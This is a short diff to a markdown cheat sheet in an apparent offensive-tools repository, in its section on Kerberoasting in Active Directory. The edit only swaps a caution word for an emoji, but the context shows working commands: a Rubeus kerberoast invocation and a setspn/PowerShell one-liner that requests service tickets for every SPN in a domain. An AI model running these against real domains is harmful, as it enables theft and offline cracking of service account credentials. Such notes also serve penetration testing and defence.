Chvxt3r/HackTools/active-directory/ad-roasting-kerberoasting.md

     Rubeus.exe kerberoast /nowrap
     ```
 * **Retrieving All Tickets Using setspn.exe**
-  Caution: This will pull all computer accounts as well, so use with caution
+  :warning: This will pull all computer accounts as well, so use with caution
   ```powershell
   setspn.exe -T <domain> -Q */* | Select-String '^CN' -Context 0,1 | % {New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
   ```